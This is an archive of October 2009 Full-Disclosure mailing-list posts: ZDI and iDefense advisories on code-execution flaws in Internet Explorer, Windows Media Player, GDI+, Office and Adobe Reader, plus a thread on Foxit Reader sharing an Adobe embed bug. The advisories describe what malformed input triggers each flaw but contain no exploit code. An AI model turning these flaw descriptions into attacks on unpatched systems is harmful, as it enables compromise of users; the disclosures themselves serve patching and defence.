Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MSIE Content-Encoding: deflate memory corruption vulnerability
Microsoft bulletin: http://www.microsoft.com/technet/security/bulletin/MS09-054.mspx Short description and repro information: http://skypher.com/index.php/2009/10/13/ms09-054cve-2009-1547-data-stream-header-corruption-vulnerability/ Cheers, SkyLined Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-069: Microsoft Windows Media Player Audio Voice Sample Rate Memory Corruption Vulnerability
ZDI-09-069: Microsoft Windows Media Player Audio Voice Sample Rate Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-069 October 13, 2009 -- CVE ID: CVE-2009-0555 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows Media Player 11 Microsoft Windows Media Player 10 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8645. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows Media Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. The specific flaw exists in the handling of Windows media audio files. When specifying a malicious sample rate for a Windows Media Voice frame, memory corruption can occur. Successful exploitation of this vulnerability can lead to remote compromise of the affected system under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx -- Disclosure Timeline: 2008-04-16 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ivan Fratric -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability
ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-070 October 13, 2009 -- CVE ID: CVE-2009-2530 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer 6 Microsoft Internet Explorer 7 Microsoft Internet Explorer 8 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8653. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the copy constructor for a specific DOM object. When duplicated, more than one reference can be made of anything assigned to it's properties. When the variable/object goes out of scope, these properties will be deallocated twice. This results in a heap corruption which can lead to code execution under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx -- Disclosure Timeline: 2009-06-23 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability
ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-071 October 13, 2009 -- CVE ID: CVE-2009-2531 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer 6 Microsoft Internet Explorer 7 Microsoft Internet Explorer 8 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8654. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required in that a user must visit a malicious web page. The specific flaw exists in the parsing of CSS style information. When a writing-mode style is used with a specific combination of HTML tags, memory corruption occurs. Exploitation of this vulnerability will lead to remote system compromise under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx -- Disclosure Timeline: 2009-06-23 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sam Thomas of eshu.co.uk -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-072: Microsoft Windows GDI+ TIFF Parsing Code Execution Vulnerability
ZDI-09-072: Microsoft Windows GDI+ TIFF Parsing Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-072 October 13, 2009 -- CVE ID: CVE-2009-2503 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows Vista Microsoft Windows XP Microsoft Windows Server 2003 Microsoft Windows Server 2008 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8661. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required in that a user must open a malicious image file or browse to a malicious website. The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted TIFF files. By supplying a malformed graphic control extension an attacker can trigger an exploitable memory corruption condition. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx -- Disclosure Timeline: 2008-02-07 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ivan Fratric -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-073: Adobe Reader Compact Font Format Malformed Index Memory Corruption Vulnerability
ZDI-09-073: Adobe Reader Compact Font Format Malformed Index Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-073 October 13, 2009 -- CVE ID: CVE-2009-2985 -- Affected Vendors: Adobe -- Affected Products: Adobe Acrobat Adobe Reader -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8658. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists when the application parses a PDF file containing a malformed Compact Font Format stream. While decoding the font embedded in this stream, the application will explicitly trust a 16-bit value used to index into an array of elements. Usage of the object later will cause heap corruption which can be leveraged to achieve code execution under the context of the current user. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb09-15.html -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.13.09: Microsoft Windows GDI+ TIFF File Parsing Buffer Overflow Vulnerability
iDefense Security Advisory 10.13.09 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 13, 2009 I. BACKGROUND The GDI+ library 'GdiPlus.dll' provides access to a number of graphics methods, via a class based API. For more information on GDI+, please visit following URL. http://msdn2.microsoft.com/en-us/library/ms533798.aspx Tagged Image File Format (TIFF) is a container format for storing images. For more information about TIFF, please visit following URL. http://partners.adobe.com/public/developer/tiff/index.html II. DESCRIPTION Remote exploitation of a heap based buffer overflow vulnerability in Microsoft Corp.'s Windows GDI+ could allow an attacker to execute arbitrary code with the privileges of the current user. This vulnerability occurs when parsing a malformed TIFF file. By supplying incorrect values in a BitsPerSample tag, it is possible to trigger a heap based buffer overflow. III. ANALYSIS Successful exploitation allows an attacker to execute arbitrary code in the context of the current user. Social engineering is required, as an attacker must trick a user into viewing an image in the Web Browser, viewing an e-mail with embedded image, opening an office file with embbeded image, or downloading an image file and opening it within a graphics rendering program. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Windows XP Service Pack 2. Please see the Microsoft bulletin for additional details on affected software. V. WORKAROUND The following workarounds can be employed to mitigate exposure to this vulnerability: *Restrict access to gdiplus.dll *Unregister vgx.dll Instructions for employing/removing these workarounds can be found in the bulletin. VI. VENDOR RESPONSE Microsoft has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://www.microsoft.com/technet/security/Bulletin/MS09-062.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-2502 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/18/2007 - Initial Contact 12/18/2007 - Initial Response 12/19/2007 - PoC Requested 12/19/2007 - PoC Sent 01/14/2008 - Status update received 03/27/2008 - Status update requested 03/28/2008 - Status update received - no estimated release date 04/28/2008 - Status update requested 04/28/2008 - Status update received - no estimated release date 01/11/2009 - Vendor states updates being silently released soon, estimates Summer bulletin release 02/26/2009 - Vendor proposed tentative disclosure date of 08/11/2009 03/05/2009 - Status update requested 04/23/2009 - Vendor reset disclosure to 10/13/2009 10/13/2009 - Coordinated public disclosure. IX. CREDIT This vulnerability was reported to iDefense by wushi of team509. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.13.09: Microsoft Office Drawing Format Shape Properties Memory Corruption Vulnerability
iDefense Security Advisory 10.13.09 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 13, 2009 I. BACKGROUND Microsoft Office is a suite of products used for document, spreadsheet, and presentation creation and viewing. Office Drawing Format is a binary file format developed by Microsoft. It is used by all Office programs to represent information about different types of shapes and drawings commonly used in Office applications. For more information see the vendor's website. http://office.microsoft.com/ II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Office could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when parsing the msofbtOPT Office Drawing record type. This record is used to provide default values for shape properties. By inserting a specially crafted property ID, it is possible to corrupt heap memory and overwrite an object pointer. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. After opening the file, no further interaction is needed to trigger the vulnerability. Due to the nature of the vulnerability, it is possible to reliably overwrite an object pointer. This lets an attacker control the object's virtual function table, which simplifies exploitation. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Office XP SP3. V. WORKAROUND The vulnerability occurs in the core parsing code, and this code can not be disabled; however, it is possible to disable the opening of the older binary format files and use MOICE to convert the file to the newer XML-based format. VI. VENDOR RESPONSE Microsoft has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://www.microsoft.com/technet/security/Bulletin/MS09-062.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-2528 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/25/2008 - Initial Contact 04/25/2008 - Initial Response 04/25/2008 - PoC Requested 07/21/2008 - PoC Requested 07/21/2008 - PoC Sent 12/11/2008 - Status Update Received - no estimated release date 02/19/2009 - Status Update Received - new case manager, estimated release date 06/09/2009 10/13/2009 - Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Marsu and an anonymous contributor. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUQArIvn8UFHWSmAQJ1TwgAqfyfut/IWpj22P88P1oM91vN101X6VbN qF+I8cNuqfBhEExjayeiQwd6MZmBWUF7CrtyTYw62ZPNtOhEyyfG522oBRQmDoky fsnHThIQ/Nyp6SCobV/vv8TmQZZ5XRnw+JeuxP1Bgqwz8hcMpLt1I196wSqu4ELE WMSrOYy84VNDoAcbCQsaXg0Kuno10yyAmpixQOCwPk/YwNuQHvow1wFDE9zbhIjI +nldlXLUR1yPOGFZSut9vB6gBN5gOranrgV5NR4cXTqjBzj/o88ElMw+GTGhVD/p EfeUCQYJ7UncvaSIMRxyqcEeKYYKjec9bpuqvNUTczvm/AKhg2torw== =pG9N -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUQArIvn8UFHWSmAQJ1TwgAqfyfut/IWpj22P88P1oM91vN101X6VbN qF+I8cNuqfBhEExjayeiQwd6MZmBWUF7CrtyTYw62ZPNtOhEyyfG522oBRQmDoky fsnHThIQ/Nyp6SCobV/vv8TmQZZ5XRnw+JeuxP1Bgqwz8hcMpLt1I196wSqu4ELE WMSrOYy84VNDoAcbCQsaXg0Kuno10yyAmpixQOCwPk/YwNuQHvow1wFDE9zbhIjI +nldlXLUR1yPOGFZSut9vB6gBN5gOranrgV5NR4cXTqjBzj/o88ElMw+GTGhVD/p EfeUCQYJ7UncvaSIMRxyqcEeKYYKjec9bpuqvNUTczvm/AKhg2torw== =pG9N -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No, I installed latest updates prior to testing. They should be aware of this however considering what appear to be striking similarities in the code base between Foxit and Adobe readers, at least as far as shared bugs go. If not they will be aware of this after they read the email I sent them. MrX Rohit Patnaik wrote: Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUc0LIvn8UFHWSmAQIITggAxL/oV6LGNuqfXj59xbV3fLAdh/6aeE7I hna0TysRDSi/bN+lE/JLyh+F8WDdr/uNb4Kzc+mTEd5vVqTp2Qlw5ctkQu9AcCxn Gk9khwhgRkxYfE/DF9RsFluRMacEaYMUNuectMz+ViCiLhYiLSBrcN9N6khSBIHZ o8ttvZBlt9ovlIu08dmuexcIVpIax8SHJj+lPWtuuRYNw/PB02hu3Pnm839nP0cD o8ZQPXkG7zvVgBVdMoVCGLWkMgw1T9P73+32TqTC7aAuY9mwRWhG3o2LZo+/Iicl Z/uIBT74SWzWZOdhzwdQdlXpmKXad1A8W7XxqfFLhea6WYmbj/MzHg== =bPXc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
Are there any available workarounds that would mitigate the threat? I suppose I could just upload all my PDFs to Google Docs in the meantime, but I'm looking for something that I could use while offline... --Rohit Patnaik On Tue, Oct 13, 2009 at 7:35 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No, I installed latest updates prior to testing. They should be aware of this however considering what appear to be striking similarities in the code base between Foxit and Adobe readers, at least as far as shared bugs go. If not they will be aware of this after they read the email I sent them. MrX Rohit Patnaik wrote: Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUc0LIvn8UFHWSmAQIITggAxL/oV6LGNuqfXj59xbV3fLAdh/6aeE7I hna0TysRDSi/bN+lE/JLyh+F8WDdr/uNb4Kzc+mTEd5vVqTp2Qlw5ctkQu9AcCxn Gk9khwhgRkxYfE/DF9RsFluRMacEaYMUNuectMz+ViCiLhYiLSBrcN9N6khSBIHZ o8ttvZBlt9ovlIu08dmuexcIVpIax8SHJj+lPWtuuRYNw/PB02hu3Pnm839nP0cD o8ZQPXkG7zvVgBVdMoVCGLWkMgw1T9P73+32TqTC7aAuY9mwRWhG3o2LZo+/Iicl Z/uIBT74SWzWZOdhzwdQdlXpmKXad1A8W7XxqfFLhea6WYmbj/MzHg== =bPXc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Adobe has fixed this issue http://www.adobe.com/support/security/bulletins/apsb09-15.html And as this bug relates to Firefox rendering embedded COM objects (PDF) inside a browser window. It should be safe to view PDF's inside both Adobe and Foxit readers whilst offline. MrX Rohit Patnaik wrote: Are there any available workarounds that would mitigate the threat? I suppose I could just upload all my PDFs to Google Docs in the meantime, but I'm looking for something that I could use while offline... --Rohit Patnaik On Tue, Oct 13, 2009 at 7:35 PM, mrx m...@propergander.org.uk wrote: No, I installed latest updates prior to testing. They should be aware of this however considering what appear to be striking similarities in the code base between Foxit and Adobe readers, at least as far as shared bugs go. If not they will be aware of this after they read the email I sent them. MrX Rohit Patnaik wrote: Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUmKrIvn8UFHWSmAQLvGgf/ZUENmHdfks44uiGTreeEAMkAtcJ0DmYB /CyHB6omJWnSWIyxUrClcIU62eK1Oue698BjIG1hiyquqFSbnLqzivhB4OSvneYH 8aQodO4gdCO8vwSaQenxO9hk1HPE8RJN9Ds5QqvPZ7qDdhEvdVeaCDyBgn4kERz/ 